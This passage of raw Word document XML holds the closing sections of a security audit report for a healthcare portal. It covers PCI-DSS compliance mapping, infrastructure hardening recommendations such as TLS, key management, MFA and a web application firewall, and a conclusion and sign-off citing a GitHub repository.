                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PCI-DSS v4.0 Req 3 &amp; Req 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Protection of stored account data and account lockout policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Credit card encryption, zero cleartext PAN storage, 5-attempt brute-force lockout, 30-minute session expiry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Residual Risk Management &amp; Future Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>While all code-level vulnerabilities within the application stack have been fully mitigated, production deployments should implement the following infrastructure-level controls:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS Termination (HTTPS): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Enforce TLS 1.3 across all external endpoints with automated Certificate Authority rotation (Let's Encrypt / AWS ACM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardware Security Modules (HSM): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Migrate encryption keys from local environment variables to centralized key management services (AWS KMS, HashiCorp Vault, Azure Key Vault).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Factor Authentication (MFA): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Implement FIDO2 / WebAuthn or TOTP-based second-factor authentication for all clinical and administrative staff.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF &amp; DDoS Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Deploy a Web Application Firewall (Cloudflare, AWS WAF) for Layer 7 inspection and automated volumetric rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>8. Conclusion &amp; Deliverables Sign-Off</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The MedSecure Healthcare Portal security audit and technical remediation project demonstrates a complete, verified transformation from a severely vulnerable baseline into a resilient, production-grade application architecture. By systematically replacing insecure patterns with industry-standard cryptographic primitives, parameterization, confinement, and role-based access controls, the project achieved a 100% reduction in static analysis warnings and a 100% exploit prevention rate across all automated test harnesses.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="EFF6FF"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="28" w:space="0" w:color="3B82F6"/>
              <w:top w:val="none"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Deliverables Acceptance &amp; Publication</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>All code deliverables, test suites, static analysis audit reports, automation pipelines, and deliverable archives have been validated and published to the GitHub repository: https://github.com/jha552093-cyber/-5-Task---Security-Enhancements-in-Python-Applications.git</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&amp; PROPRIETARY — FOR SECURITY AUDIT &amp; TECHNICAL REVIEW PURPOSES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MedSecure Portal | Security Audit &amp;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